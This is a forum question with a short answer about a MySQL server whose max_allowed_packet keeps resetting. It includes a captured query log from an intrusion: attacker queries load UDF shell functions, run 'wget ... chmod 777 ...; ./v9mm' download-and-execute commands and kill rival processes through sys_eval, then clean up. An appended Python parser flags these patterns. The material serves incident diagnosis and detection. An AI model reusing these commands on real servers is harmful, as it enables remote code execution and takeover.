max_allowed_packet is resetting to 1024 because of some unknown application

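Whenever I change max_allowed_packet, it resets after a few hours. When I checked the query log, I found the following queries, but I can't figure out which application or process executes them. Does anyone know what this is about? Or is it MySQL itself?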

161020  3:09:34   723 Query CREATE FUNCTION sys_get RETURNS string SONAME 'ptfuki32.so'
          723 Query CREATE FUNCTION sys_get RETURNS string SONAME 'ptfuki32.so'
          723 Query CREATE FUNCTION sys_get RETURNS string SONAME 'ptfuki32.so'
          723 Query CREATE FUNCTION sys_get RETURNS string SONAME 'ptfuki32.so'
          723 Query CREATE FUNCTION sys_set RETURNS int SONAME 'ptfuki32.so'
161020  3:09:35   723 Query CREATE FUNCTION sys_exec RETURNS int SONAME 'ptfuki32.so'
          723 Query CREATE FUNCTION sys_eval RETURNS string SONAME 'ptfuki32.so'
          723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
          723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
          723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
          723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
161020  3:09:36   723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
          723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
          723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
          723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
          723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
161020  3:09:37   723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
          723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
          723 Quit  
          724 Connect   root@ip on mysql
161020  3:09:38   724 Query SHOW VARIABLES LIKE '%compile_os%'
          724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
          724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
          724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
          724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
          724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
161020  3:09:39   724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
          724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
          724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
          724 Query select sys_eval('killall -9 .sshd')
          724 Query select sys_eval('killall -9 .sh')
161020  3:09:40   724 Query select sys_eval('killall -9 and1')
          724 Query select sys_eval('killall -9 cisco')
          724 Query select sys_eval('killall -9 ciscoh')
          724 Query select sys_eval('killall -9 L24')
          724 Query select sys_eval('killall -9 L26')
161020  3:09:41   724 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
          724 Query select sys_eval('chmod 777 http://ip:5555;')
          724 Query select sys_eval('./http://ip:5555;')
          724 Query select sys_eval('kill str=`netstat -anept 2>/dev/null |grep -E ':(68866|7583|2222|10711|6009|10991|10771|7168|7668|36000|36001|25000|25001|25002)'|cut -d / -f 1`')
          724 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
161020  3:09:42   724 Query select sys_eval('wget http://ip4:5555/v9mm;chmod 777 v9mm;./v9mm;')
          724 Quit  
          725 Connect   root@ip on mysql
          725 Query SHOW VARIABLES LIKE '%compile_os%'
161020  3:09:43   725 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
          725 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
          725 Query FLUSH PRIVILEGES
          725 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
          725 Query FLUSH PRIVILEGES
161020  3:09:44   725 Query DROP FUNCTION IF EXISTS lib_mysqludf_sys_info
          725 Query DROP FUNCTION IF EXISTS sys_get
          725 Query DROP FUNCTION IF EXISTS sys_set
161020  3:09:45   725 Query DROP FUNCTION IF EXISTS sys_exec
          725 Query DROP FUNCTION IF EXISTS sys_eval
          725 Query DROP FUNCTION IF EXISTS cmdshell
          725 Query set global log_bin_trust_function_creators=0
          725 Query SET GLOBAL log_bin_trust_function_creators=FALSE
161020  3:09:46   725 Query SET GLOBAL log_bin_trust_routine_creators=0
          725 Query SET GLOBAL max_allowed_packet=1024
          725 Query FLUSH PRIVILEGES
          725 Query DROP FUNCTION IF EXISTS lib_mysqludf_sys_info
          725 Query DROP FUNCTION IF EXISTS sys_get
161020  3:09:47   725 Query DROP FUNCTION IF EXISTS sys_set
          725 Query DROP FUNCTION IF EXISTS sys_exec
          725 Query DROP FUNCTION IF EXISTS sys_eval
          725 Query DROP FUNCTION IF EXISTS cmdshell
          725 Query set global log_bin_trust_function_creators=0
161020  3:09:48   725 Query SET GLOBAL log_bin_trust_function_creators=FALSE
          725 Query SET GLOBAL log_bin_trust_routine_creators=0
          725 Query SET GLOBAL max_allowed_packet=1024
          725 Query FLUSH PRIVILEGES
          725 Quit

It seems someone attacked my MySQL server with SQL injection. cna12.dll is the malware file. See the link below to prevent this kind of attack: https://malwaremusings.com/2013/02/14/how-to-protect-yourself-from-the-cna12-dll-mysql-attacks/
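
Added example (not part of the original question or answer): a small Python parser for the old-style general query log format shown above. It groups statements by connection id, ties each connection to the account on its `Connect` line, and flags UDF loading, `sys_eval`/`sys_exec` calls, `SET GLOBAL` changes and UDF cleanup. The sample log is constructed; its host, library name and commands are placeholders.

```python
import re
from collections import OrderedDict

# Old-style general query log line: optional "YYMMDD H:MM:SS", thread id, command, argument.
LINE = re.compile(r"^(?:(\d{6}\s+\d{1,2}:\d{2}:\d{2}))?\s*(\d+)\s+(Connect|Query|Quit)\s*(.*)$")

RULES = [
    ("udf_load", re.compile(r"CREATE\s+FUNCTION\s+\w+\s+RETURNS\s+\w+\s+SONAME", re.I)),
    ("os_command", re.compile(r"\bsys_(?:eval|exec)\s*\(", re.I)),
    ("global_change", re.compile(r"SET\s+GLOBAL\s+\w+", re.I)),
    ("udf_drop", re.compile(r"DROP\s+FUNCTION", re.I)),
]

def suspicious_sessions(log_text):
    """Return {thread_id: {"account", "first_seen", "findings"}} for flagged sessions."""
    sessions, last_ts = OrderedDict(), None
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        ts, tid, cmd, arg = m.groups()
        last_ts = ts or last_ts  # lines without a timestamp inherit the previous one
        s = sessions.setdefault(int(tid), {"account": None, "first_seen": last_ts, "findings": []})
        if cmd == "Connect":
            s["account"] = arg.split(" on ")[0].strip()  # argument is "user@host on db"
        elif cmd == "Query":
            for name, rx in RULES:
                if rx.search(arg) and (name, arg) not in s["findings"]:
                    s["findings"].append((name, arg))  # repeated statements are kept once
    return {tid: s for tid, s in sessions.items() if s["findings"]}

# Constructed sample in the same log format; host, library name and commands are placeholders.
SAMPLE = """\
161020  3:09:34   723 Query CREATE FUNCTION sys_eval RETURNS string SONAME 'example_udf.so'
          723 Query select sys_eval('id')
          723 Query select sys_eval('id')
          723 Quit
          724 Connect   root@203.0.113.5 on mysql
161020  3:09:46   724 Query SET GLOBAL max_allowed_packet=1024
          724 Query DROP FUNCTION IF EXISTS sys_eval
          725 Connect   app@localhost on shop
          725 Query SELECT * FROM orders
"""

if __name__ == "__main__":
    for tid, s in suspicious_sessions(SAMPLE).items():
        print(tid, s["account"] or "unknown (Connect line not in excerpt)", s["first_seen"])
        for name, stmt in s["findings"]:
            print("   ", name, "|", stmt)
```

A session whose `Connect` line falls before the start of the excerpt (like connection 723 in the log above) is reported with no account; widen the log window to find it.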